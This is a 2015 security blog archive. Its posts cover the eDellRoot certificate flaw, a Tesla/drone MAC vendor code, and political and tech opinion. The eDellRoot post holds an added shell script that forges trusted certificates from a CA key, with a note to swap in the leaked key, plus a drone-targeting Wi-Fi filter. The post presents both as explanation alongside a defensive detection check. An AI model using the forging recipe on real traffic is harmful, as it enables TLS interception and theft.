Monday, November 23, 2015

Some notes on the eDellRoot key

It was discovered this weekend that new Dell computers, as well as old ones with updates, ship with a CA certificate ("eDellRoot") in the trusted root store, together with its private key. Anyone holding that key can mint a certificate for any hostname that those machines will trust, so an attacker on the same network can intercept the SSL communications of Dell computers. I explain how in this blog post, just replace the "ca.key" with "eDellRoot.key".

If I were a black-hat hacker, I'd immediately go to the nearest big city airport and sit outside the international first class lounges and eavesdrop on everyone's encrypted communications. I suggest "international first class", because if they can afford $10,000 for a ticket, they probably have something juicy on their computer worth hacking.

I point this out in order to describe the severity of Dell's mistake. It's not a simple bug that needs to be fixed, it's a drop-everything and panic sort of bug. Dell needs to panic. Dell's corporate customers need to panic.

Note that Dell's spin on this issue has started, saying that they aren't like Lenovo, because they didn't install bloatware like Superfish. This doesn't matter. The problem with Superfish wasn't the software, but the private key. In this respect, Dell's error is exactly as bad as the Superfish error.
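What "the private key ships with the certificate" buys an attacker, as an added example that is not code from the original post: with the CA key in hand, you mint a certificate for whatever hostname you want to impersonate, and every client that trusts the CA accepts it. The real eDellRoot material is deliberately not included; a throwaway self-signed CA stands in for it (substitute eDellRoot.key and eDellRoot.crt to reproduce the actual attack), and www.example-bank.test is a made-up victim hostname. Requires the openssl command-line tool.

```shell
#!/bin/sh
# Added example, not from the original post. A throwaway CA stands in for
# eDellRoot; the hostname being impersonated is hypothetical.

# Mint a leaf certificate for <hostname> signed by the CA in <ca.key>/<ca.crt>,
# then run the same check a browser or TLS library performs: chain to a
# trusted root plus hostname match. Returns 0 when the forged cert is accepted.
forge_and_verify() {   # usage: forge_and_verify <ca.key> <ca.crt> <hostname>
  ca_key=$1; ca_crt=$2; target=$3
  work=$(mktemp -d)
  # Key and CSR for the site being impersonated. The attacker owns this key,
  # so the victim's real server is never involved.
  openssl req -newkey rsa:2048 -nodes -keyout "$work/leaf.key" \
      -out "$work/leaf.csr" -subj "/CN=$target" 2>/dev/null
  # Modern clients ignore the CN and require a subjectAltName.
  printf 'subjectAltName=DNS:%s\n' "$target" > "$work/san.ext"
  openssl x509 -req -in "$work/leaf.csr" -CA "$ca_crt" -CAkey "$ca_key" \
      -CAcreateserial -out "$work/leaf.crt" -days 30 \
      -extfile "$work/san.ext" 2>/dev/null
  # With the stolen CA key this passes, which is the whole problem.
  openssl verify -CAfile "$ca_crt" -verify_hostname "$target" "$work/leaf.crt"
  rc=$?
  rm -rf "$work"
  return $rc
}

# Stand-in root CA (hypothetical; replace with the leaked eDellRoot material).
make_standin_ca() {   # usage: make_standin_ca <dir>
  openssl req -x509 -newkey rsa:2048 -nodes -keyout "$1/ca.key" \
      -out "$1/ca.crt" -days 365 -subj "/CN=Stand-in Root CA" 2>/dev/null
}

if command -v openssl >/dev/null 2>&1; then
  cadir=$(mktemp -d)
  make_standin_ca "$cadir"
  forge_and_verify "$cadir/ca.key" "$cadir/ca.crt" www.example-bank.test
  rm -rf "$cadir"
fi
```

The check a practitioner wants on a Dell machine is whether the root is present at all: in PowerShell, `Get-ChildItem Cert:\LocalMachine\Root | Where-Object { $_.Subject -like '*eDellRoot*' }`, or `certutil -store Root eDellRoot` from a command prompt. Any hit means every forged certificate produced the way shown above is trusted by that machine.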

Wednesday, November 04, 2015

We should all follow Linus's example

Yet another Linus rant has hit the news, where he complains about how "your shit code is fucking brain damaged". Many have complained about his rudeness, how it's unprofessional, and part of the culture of harassment in tech. They are wrong. Linus Torvalds is the nicest guy in tech. We should all try to be more like him.

The problem in tech isn't bad language ("your shit code"), but personal attacks ("you are shit").

A good example is Brendan Eich, who was fired from his position as Mozilla CEO because people disagreed with his political opinions. Another example is Nobel prize winner Tim Hunt who was fired because people took his pro-feminist comments out of context and painted him as a misogynist. Another example is Pax Dickinson, who was fired as CTO of Business Insider because of jokes he made before founding the company. A programmer named Curtis Yavin* was booted from a tech conference because he's some sort of monarchist. Yet more examples are the doxing and bomb threats that censor both sides of the GamerGate fiasco. The entire gamer community is a toxic cesspool of personal attacks. We have another class of people, the "SJW"s, who viciously attack those they disagree with, trying to get them fired. They treat those who make a mistake or disagree with them as evil misogynists who need to be punished, rather than as people who need to be corrected -- or debated.

What all these things have in common is that they attack the person. They strive to dehumanize the person, to make them an un-person, so that we stop empathizing with them. These attacks seek to intimidate and punish, not to educate or inform.

Linus punishes nobody. He intimidates nobody. He has that power, to act as a dictator to ban people for life from the Linux kernel, but doesn't use that power. Indeed, his use of power demonstrates extreme humility. Even in this case, he declares he doesn't "want" to accept the code into the kernel, not that he "won't".

His rant is designed to inform. The Linux kernel is a work of art based on certain consistent principles, such as not needlessly obfuscating implementation details. He takes the time to yet again lay out his philosophy that guides the kernel. Yes, his language is strong, but I'm not sure how else he'd communicate the unreasonableness of the code in question.

Personal attacks are increasingly the norm in our society. Pick any political debate -- the basis of people's arguments is not that the opposition is wrong, but that they are unreasonable and sub-human. Such discourse would improve if everyone emulated Linus's example, as we'd start debating the issues (albeit with coarse language) rather than attacking each other.

Seriously, try it. Can you debate issues like abortion, anti-vaxx, taxes, immigration, or global warming in such a way that it doesn't include dehumanizing personal attacks? Can you debate such issues with the overwhelming belief that your opponents are reasonable people? Linus displays that belief. You don't.

Linus could, of course, be even nicer. But the thing is, Linus doesn't ruin careers, unlike these harassers feted by WIRED.

The Godwin fallacy

As Wikipedia says:
Godwin's law and its corollaries would not apply to discussions covering known mainstays of Nazi Germany such as genocide, eugenics, or racial superiority, nor to a discussion of other totalitarian regimes or ideologies, if that was the explicit topic of conversation, because a Nazi comparison in those circumstances may be appropriate, in effect committing the fallacist's fallacy, or inferring that an argument containing a fallacy must necessarily come to incorrect conclusions.
An example is a discussion of whether waving the Confederate flag is "hate speech" or "fighting words", and hence undeserving of First Amendment protections.

Well, consider the famous march by the American Nazi party through Skokie, Illinois, displaying the Swastika flag, where 1 in 6 residents was a survivor of the Holocaust. The Supreme Court ruled that this was free speech, that the Nazis had a right to march.

Citing the Skokie incident isn't Godwin's Law. It's exactly the precedent every court will cite when deciding whether waving a Confederate flag is free-speech.

I frequently discuss totalitarianism, as it's something that cyberspace can both enable and defeat. Comparisons with other totalitarian regimes, notably Soviet Russia and Nazi Germany, are inevitable. They aren't Godwin hyperbole, they are on point. Those who quickly cite Godwin's Law are committing the "fallacist's fallacy", or the "Godwin's Fallacy".

Saturday, October 31, 2015

Prez: Rick Perry selling his mailing list

I created separate email accounts to receive email from each of the 25 presidential candidates (and donated money to all of them). This allows me to track their behavior -- or misbehavior.

Rick Perry exited the race 50 days ago. Today, I got two emails to my special Perry address. One email was from Ted Cruz, another presidential candidate. The other was from Paul Ryan, the new Speaker of the House.

Here's Ted Cruz's email, sent to my Perry account. It's actually identical to one I received on my Cruz account. (I've hidden the To: address, except for the 'rick' part).

The email headers look like:

Received: from ( [])
 by projectp (Postfix) with ESMTP id 1266C26041B
 for ; Fri, 30 Oct 2015 16:28:59 +0000 (UTC)

Rick Perry uses the company "TargetedVictory" for his mass emailings, whereas Ted Cruz uses another company. The Cruz email to my Perry address came through TargetedVictory, Perry's vendor, not Cruz's. This shows that Perry didn't give his address list to Cruz, but instead let Cruz use the address list.

I saved a copy of Perry's privacy policy when I made the donation. It implies that he won't give out my private information to somebody else, but nothing in the policy says he won't use my private information in this manner. I don't think it's changed, so you can read Rick Perry's privacy policy here and decide for yourself if this use of my private information is valid.

The other email was from Paul Ryan asking for donations to the NRCC. Apparently, the reason Paul Ryan took the job of Speaker was solely for the children.

What is the NRCC? I had to look it up on Wikipedia. It's a SuperPAC set up in 1866 to support House Republicans. They get a couple hundred million dollars in donations every year. There's a similar DCCC for the Democrats.

As a side note: Thunderbird claims this might be a "scam". I love the irony.

So why these emails from Perry? One answer could be money, that they paid him to use his mailing list. Another could be politics, that in exchange for pimping his donors, he could receive political consideration for other things, like being named ambassador or something. Thirdly, he could just be a nice guy who wants to see Republicans and his fellow Texan win.

My bet is this, that we'll see Perry officially endorse Ted Cruz in the next couple weeks, announced at some major event, timed to give Cruz a boost in the polls. If that's the case, then this would be an interesting lesson in how projects like this can scoop what's going on inside the campaigns.

Update: there is a comment thread over at Reddit.

Prez: donation numbers

I've given $10 to every candidate to monitor what they do. As I blogged before, just before the quarterly filing deadline, I got emails from all the candidates begging for money, to impress people with how much money they've gathered. Well, here are the amounts each candidate received last quarter:


Of course Hillary and Bernie are at the top, since they are the only two major contenders on the Democrat side, so split the pool between them.

What's interesting is how Scott Walker exited the race, and Jeb! scaled back his spending, because their donations dropped precipitously. Even though they got huge donations last quarter, they spent the money as fast as they could. Presidential campaigns are like venture capital that way: you spend money aggressively in order to make more money. If you are right, this strategy wins; if you are wrong, you go bankrupt quickly. (And going bankrupt quickly is preferable to being a zombie barely hanging in there.)

Or, instead of the aggressive strategy, you could just play it cool for a bit, waiting for the press to get tired of Trump. As we saw last election cycle, the press would suddenly get excited about a candidate for a bit, they'd shoot up in the polls, start to overspend, then the press would get bored, and their campaigns would go bankrupt. Those who lasted till the end were those who ran a more conservative campaign. Maybe banking a bit of money now in order to tide you through the press's fickleness would be a good strategy.

Then there is the Rand Paul strategy. He's got a bunch of rabid followers (like me), so he can keep in the race until everyone has got tired of all the "normal" candidates. His father Ron used that strategy, and it works well.

Another way to look at candidate popularity (instead of polls and donations) is betting sites, as tracked by this site. While polls point to Trump and donations point to Carson, that site claims Rubio has the best chance of getting the Republican nomination by far. If you believe this is wrong, and if your beliefs are right, then you can go onto numerous online betting websites (including with Bitcoin) and make the appropriate bet.

In theory, online betting sites are the worst way to predict the winner. Yes, I said worst. That's because if there was enough liquidity in the market for them to be statistically valid, then there would also be enough liquidity for hedging. Consider Rubio. Now that he is leading among bettors, he can then invest in betting on his competition. Should his campaign falter (donations drop, lose popularity), then the odds of his competitors will go up. He can thus sell those contracts and make a ton of money, enough to overcome the drop in donations. Or, everyone can hedge their bets for candidates they know will be hostile to their interests. For example, all 1%ers should be buying contracts betting on Bernie Sanders winning. Sure, they'll lose money as Sanders taxes them to death, but they'll earn a lot of money at 10 to 1 odds on the betting sites.

There have been lots of articles on the "wisdom of the crowds", but sadly, none have pointed out this hedging angle that makes their predictions inherently inaccurate.

Friday, October 30, 2015

Yes, the CNBC moderation was biased

In anger over CNBC's left-wing bias, the Republican party has suspended them from moderating future debates. Is there something to this?

Yes and no. CNBC, like most of the media, has a strong left-wing bias. On the other hand, the Republicans are quick to label legitimate criticism as examples of bias.

There is an easy way to detect improper bias. The principle of journalism is that there are two reasonable sides to any debate. One side may be wrong, of course, but both sides are reasonable. Partisan bias, however, involves arguing that one side in the debate is unreasonable. When the press calls somebody a "comic book clown", then it's bias. Merely saying they are "wrong" is not bias.

That's what happened many times during the CNBC moderated debate of Republican candidates, most egregiously when they called Trump a "comic book" version of a candidate. We all know that Trump is a demagogue, that he appeals to the ignorant masses more than intelligent people. But when you drill down on Trump's ideas, what you'll find is that he's usually merely wrong rather than irrational. For example, a couple months ago, Trump was attacked in the press for saying "the constitution is unconstitutional". Actually, if you look at what Trump really said, in context, you'll find a quite reasonable interpretation of the 14th amendment. Not a likely "correct" interpretation, mind you, but still a "reasonable" one.

Moderators should attack Trump based on the assumption that he's reasonable. Everyone knows you can't deport all the illegal aliens in America without violating everyone's constitutional right to "due process". Does Trump propose suspending due process? Or does he have a concrete plan that'll prove everybody wrong? That's the question I'd ask him, instead of calling him a clown.

But it's not just with Trump where the moderators let their bias show. Another example was a question to Ben Carson on gay marriage. The left-wing press assumes that the Republican stance on gay marriage is due to bigotry, and hence, is unreasonable. That's not true.

Our society is quickly transitioning from a point when gays were ostracized to one where they are accepted. Democrats and Republicans handle this transition in different ways. As "conservatives", Republicans are of course going to handle this by being unwilling to change existing institutions. In particular, marriage has religious associations that Republicans are sensitive to. Had the national debate centered on "civil unions" instead of "gay marriage", as it did in France, you would have seen a very different response from both Republicans and Democrats.

The CNBC moderator let his bias show by implicitly assuming Republicans were anti-gay bigots in his question to Carson:
MODERATOR: Why would you serve on a company whose policies [gay partner benefits] seem to run counter to your views on homosexuality?
CARSON: Well, obviously, you don't understand my views on homosexuality … [One] shouldn't automatically assume that because you believe that marriage is between one man and one woman that you are a homophobe.
In other words, Carson's response was that his views on homosexuality are not the unreasonable caricature drawn by the CNBC moderator, and that of course gays deserve the same rights as everyone else.

Despite what I said above, gay marriage is indeed cover for a lot of homophobia. Kim Davis is proof: her rampant adultery and four marriages are as far from any Christian definition of the institution as gay marriage. Debate moderators should probe this -- but based on the assumption Republicans are reasonable people and not bigots. An example might be:
Moderator (me): Last year, the RNC put out a video declaring that everyone is welcome in the Republican party: men, women, whites, blacks, hispanics, and so on. Yet they didn’t mention gays. Do Republicans welcome gays? If you get the Republican nomination, what will you do to make gays feel more welcome in the party?

A similar issue is climate change. Republicans don’t deny the scientific consensus behind climate change. They may be wrong, not taking the issue seriously enough, but they aren’t unreasonable people who deny science. But "denialism" is too attractive an argument for Democrats, and the left-wing media has seized upon it, clearly violating their own journalistic principles to make it true.

This bias is apparent in CNBC’s question:
Moderator: Governor Christie, you've said something that many in your party do not believe, which is that climate change is undeniable, that human activity contributes to it, and you said, quote: "The question is, what do we do to deal with it?".
Journalistically, the moderator's claim that "many in [the] party do not believe" is unsupported by the available evidence. It's a weird thing, because everyone knows it's true, but when you go hunting for the evidence, you'll find it difficult to find. Instead, what you'll find are statements like these at ClimateProgress, which when twisted out of context seem to indicate denialism, but which don't explicitly deny that human activity contributes to climate change.

If I were a candidate, I’d prepare for this question with the following response:
Candidate (me): Point of order. You make the claim that many Republicans deny that human activity contributes to climate change. Of the 10 candidates on this stage, Mr. Moderator, how many of us do you think would deny this?
Candidate: Okay fellow candidates, raise your hand if you deny that human activity contributes to climate change.
Candidate: As you know, we Republicans often complain of media bias. What just happened demonstrates why. We want to have substantive debate on this issue, but you can’t stop calling us deniers.

The problem being discussed here is not that journalists believe Republicans to be wrong. Instead, the problem is that journalists believe the Republicans to be unreasonable. Despite the fact that Republicans are often too quick to label valid criticism as "bias", a problem does exist. In the CNBC hosted debate, several questions (as shown here) are based on the erroneous belief that Republicans are unreasonable rather than merely wrong.

Wednesday, October 28, 2015

OMG, the machines are breeding! Mankind is doomed! DOOMED!!!

My Tesla has the same MAC address vendor code as an AR Drone. These are two otherwise unrelated companies, yet they share the same DNA. Flying drones are mating with land-based autonomous vehicles. We are merely months away from Skynet gaining self-awareness and wiping out mankind.

You can see this in the screenshot below, where we see the output of a hacking program that monitors the raw WiFi traffic. The AR Drone acts as an access-point so that your iPhone can connect to it in order to fly the drone. The Tesla, on the other hand, is looking for an access-point named "Tesla Service", so that when you drive it in for service, it'll automatically connect to their office and exchange data. As you can see, both devices have the same vendor code of "90:03:B7" for Parrot SA.

Here is a picture of the AR Drone cavorting with the car. The top arrow points to the drone, the bottom arrow points to the car.

So why the relationship? Why does the Tesla look like a drone on WiFi?

The company Parrot SA started out creating kits for cars that contain WiFi, Bluetooth, and voice control. Since they were already building embedded WiFi, they apparently used that expertise to make a flying drone controlled via WiFi (from an iPhone app). So while it seems odd that Parrot would sell both drones and automobile components, it's actually overlapping expertise.

Car companies like Tesla don't design everything themselves. Instead, the car is assembled from pieces built by other companies. The leather interior, for example, is made by a company that makes leather for other luxury cars. The paint is a standard automobile paint. Tesla just included the Parrot voice command and WiFi control unit instead of designing their own. I think even the "autopilot" feature is software developed by another company. The only bits that are truly unique to Tesla are the batteries, the engine, and the stamped aluminium car body.

The same is true throughout the spectrum of Internet-of-things, self-driving cars, and flying drones. All these products are assembled from the same industry base. For example, the nVidia Tegra chips in my Tesla are the same as can be found in "June Intelligent Ovens". Why do ovens need advanced GPUs in order to display the temperature? I don't know, they just do, otherwise Skynet won't get enough compute power to become sentient.

Samy Kamkar has a tool, "SkyJack", for attacking drones. It identifies targets based on the MAC address vendor code. Thus, his tool could potentially attack my car by accident instead:
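How coarse a vendor-code match really is, as an added example that is not code from the original post nor from SkyJack: the filter below parses monitor-mode capture lines, keeps only frames whose source MAC carries Parrot's OUI 90:03:B7, and reports what each device is doing. With the OUI alone, the drone (an access point sending beacons) and the car (a client sending probe requests for "Tesla Service") both match; requiring beacon frames, which is my own refinement rather than anything SkyJack does, is enough to drop the car. The sample lines are constructed to imitate tcpdump's 802.11 output, with made-up lower MAC bytes and SSIDs.

```shell
#!/bin/sh
# Added example, not from the original post or SkyJack. Sample frames are
# constructed (tcpdump-style 802.11 lines, invented MAC suffixes and SSIDs).

PARROT_OUI="90:03:b7"

SAMPLE='12:00:01.000 BSSID:90:03:b7:11:22:33 DA:Broadcast SA:90:03:b7:11:22:33 Beacon (ardrone2_001122) ESS CH: 6
12:00:01.500 BSSID:Broadcast DA:Broadcast SA:90:03:b7:aa:bb:cc Probe Request (Tesla Service)
12:00:02.000 BSSID:Broadcast DA:Broadcast SA:f0:de:f1:44:55:66 Probe Request (HomeWifi)
12:00:02.500 BSSID:90:03:b7:11:22:33 DA:Broadcast SA:90:03:b7:11:22:33 Beacon (ardrone2_001122) ESS CH: 6'

# Print "<mac> <frame-type> <ssid>" once per unique source MAC whose first
# three bytes equal the given OUI. Reads capture lines on stdin.
oui_matches() {   # usage: oui_matches <oui>
  awk -v oui="$1" '
    {
      sa = ""
      for (i = 1; i <= NF; i++) if ($i ~ /^SA:/) sa = tolower(substr($i, 4))
      if (substr(sa, 1, 8) != oui || seen[sa]++) next
      kind = ($0 ~ /Probe Request/) ? "probe-request" : ($0 ~ /Beacon/) ? "beacon" : "other"
      ssid = ""
      if (match($0, /\([^)]*\)/)) ssid = substr($0, RSTART + 1, RLENGTH - 2)
      print sa, kind, ssid
    }'
}

# Refinement (mine, not SkyJack'"'"'s): a drone you can hijack is an access point,
# so it sends beacons. The car only probes, so it drops out.
drone_targets() {   # usage: drone_targets <oui>
  oui_matches "$1" | awk '$2 == "beacon"'
}

printf '%s\n' "$SAMPLE" | oui_matches "$PARROT_OUI"
echo "--- beacons only ---"
printf '%s\n' "$SAMPLE" | drone_targets "$PARROT_OUI"
```

Feed it a real capture (`tcpdump -I -i wlan0 -e` in monitor mode produces lines of this shape) and the first listing is the set of devices an OUI-only targeting rule would hit; the second is what survives once you insist the device actually behaves like a drone.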

The point is this: the machines are breeding out of control. This can only lead to disaster. Mankind is doomed.

Friday, October 23, 2015

Dumb, dumber, and cybersecurity

The reason you got hacked is because you listen to dumbasses about cybersecurity, like Microsoft.

An illustrative example is this article on "10 steps to protect" yourself. The vast majority of cyber threats to a small business are phishing, password reuse, and OWASP threats like SQL injection. That article addressed none of these threats.

But it gets better.

At the bottom of that article is a link to this "Cyber Security IQ" quiz at Microsoft's small-business website. The first question asks about password sharing. I show their "right" answer here:

Their correct answer is "None of the above", meaning that it's not okay to share your passwords with anybody. But this is nonsense. For your work account, of course it's okay to share your password with your boss. In fact, it's often necessary.

There have been several court cases where IT administrators have been fired, where the companies later found that the fired employee is the only one with passwords to certain critical systems. The (former) administrators were prosecuted for refusing to give their former bosses the passwords.

If your boss demands your password to your corporate accounts, of course you must give them your password.

But it gets better. Way better.

While answering the second question, this happened.
Whenever you visit this website, on pretty much any page as far as I can tell, you are going to get this popup asking to chat after a few minutes. At first I thought it was tied to this question (which would be clever), but it isn't -- it's a site-wide thing, unrelated to this quiz.

The correct answer to the underlying quiz question is "Press Alt + F4", which closes the browser window. That's because a hostile popup's [x] is often not a real close button: it is positioned so that your click lands on something the attacker controls ("clickjacking"). You should never click anywhere on a popup.

But of course, if you did hit Alt-F4 to close the window, you could never complete this "Cyber Security IQ" quiz, because you'd always get this popup.

Here's my point. The "10 steps" article and the "IQ" quiz are why we can't solve cybersecurity. They are created by marketing people with plausible sounding advice, like "make sure you have a firewall". The reason you get hacked is because you listen to this plausible advice, while ignoring the real problems you have. Phishing, password re-use, and SQL injection have been the most popular hacks for 15 years because everyone does cybersecurity the Microsoft way shown above, instead of actually paying attention to the problem. Among your cybersecurity plans you should have three documents entitled "How we stop phishing", "How we stop password re-use", and "How we stop OWASP Top 10". If you don't, you suck.

It could be that this popup is an obscenely clever trick to measure your real IQ. But I tested it. No matter which webpage you go to on the site, after a few minutes this popup appears.

Ethics of killing Hitler

The NYTimes asks us: if we could go back in time and kill Hitler as a baby, would we do it? There's actually several questions here: emotional, moral, and ethical. Consider a rephrasing of the question to focus on the emotional question: could you kill a baby, even if you knew it would grow up and become Hitler?

But it's the ethical question that comes up the most often, and it has real-world use. It's pretty much the question Edward Snowden faced: should he break his oath and disclose the NSA's mass surveillance of Americans?

I point this out because my ethical response is "yes, and go to jail". The added "and go to jail" makes it a rare response -- lots of people are willing to kill Hitler if they don't suffer any repercussions.

For me, the hypothetical question is "If you went back in time and killed Hitler, would you go to jail for murder?". My answer is "yes". I'd still do my best to lessen the punishment. I'd hire the best lawyer to defend me. It's just that I would put judgement of my crime or heroism in the hands of others. I would pay the consequences, whatever they were.

Another way of looking at the question is: "If you had a time machine, is killing Hitler the best option?". Maybe if you sent a hot chick back in time to get Hitler laid as a teenager, he wouldn't be so angry at the world. Maybe if you went back in time and purchased his crappy paintings, or hired him as an architect, you could steer his life onto another path. Seriously, the time stream is full of butterflies that simply need to flap their wings in order to divert Hitler from genocide.

I point this out because it's "murder" that is the question, and Hitler is only window dressing.

There is a cybersecurity bill, "CISA", in front of congress right now that will be voted on next week. But "cybersecurity" is only the window dressing. The tech industry and cybersecurity experts oppose it. Its only supporters are the intelligence community, like the FBI and NSA. It's really a disguised surveillance bill. Just like people seem uninterested in stopping Hitler through some means other than murder, government is uninterested in stopping hackers through some other means than mass surveillance and a police state.

Anyway, those are my two answers to the "kill Hitler" question. If I had a time machine, my first choice wouldn't be "murder". If I did choose "murder", I'd expect to go to jail for it.

Thursday, October 22, 2015

Car hacking is as fake as the moonlanding

How can the flag stay up? There's no wind on the moon!! #fake
David Pogue at Scientific American has an article claiming that hacking cars is "nearly impossible" and "hypothetical", using the same sorts of arguments crazies use trying to prove the moon landing was faked.

Of course, "hacking a car" probably doesn't happen as the public imagines. Delving into the details, you'll find things you didn't expect. It's like the stars in pictures at the moon landing. Because of contrast issues with the bright foreground, the dim stars disappear. This has led to crazies saying the lack of stars are proof that the moon landings were faked, because they don't understand this technical issue. Similarly, Pogue claims car hacking is fake because the technical details don't match his ignorant prejudices.

Pogue's craziest claim is that the Jeep hack is fake because Jeep fixed the issue. Nobody can hack a Jeep as the researchers claim. But that's because the researchers proved to Jeep that it was possible, and gave time for Jeep to fix the problem. It's like claiming the 9/11 terrorist attacks are purely hypothetical, because the Twin Towers of the World Trade Center no longer exist.

The misunderstanding here is that Pogue believes the hack was a one time thing, that now that Jeep fixed the problem, no more hacks will be possible in the future.

The reality is that this hack proves that a whole new class of bugs exist. You don't patch your iPhone or Windows laptop once. Instead, you've been updating your iPhone and Windows computer once a month for over a decade because new hacks keep getting discovered. The relevance of the "car hacking" research is that cars are enormously complex computers full of flaws. It's a message that nobody will pay attention to until the first set of flaws are published. Now that those flaws have been exposed, it'd be insane to continue to ignore this message and pretend future flaws won't be found. Pogue is that insane.

The consequences are manifold. It means that car makers need to find an easier way to regularly update their software rather than the traditional "recall" process of taking the car to the dealer and leaving it there for a few days. It means car makers need to change how they develop software, getting rid of the obvious bugs they have now (such as putting Jeeps on the Internet so that anybody can scan and find them).

This is the battle of cybersec. The issues are clear and obvious to us, yet we are unable to overcome the obstinate ignorance as demonstrated in Pogue's post.

Disclaimer of reasonableness: It's impolite to accuse an otherwise reasonable person of being one of those "fake moon landing" nuts. Indeed, he makes a cogent point that many will misinterpret things and be too fearful of car hacking. Automobile related deaths are unlikely to show a statistical increase due to car hacking. He's not crazy. However, Pogue is profoundly ignorant of the issue, his strong assertions are not borne out by the facts, and this is indeed a danger that needs to be addressed. I don't know how to communicate the profoundness of his error without comparing it to something like the moon landing.

Update: Many have argued Chris Valasek and Charlie Miller went too far, demonstrating their hack on a live freeway. They claim it would've been just as believable on a racetrack instead. Pogue's article proves this wrong. It means Pogue would've added to his article "It wasn't in real traffic conditions, but only on a racetrack". We experts see no essential difference, but the ignorant like Pogue do. Obviously, Valasek and Miller didn't go far enough.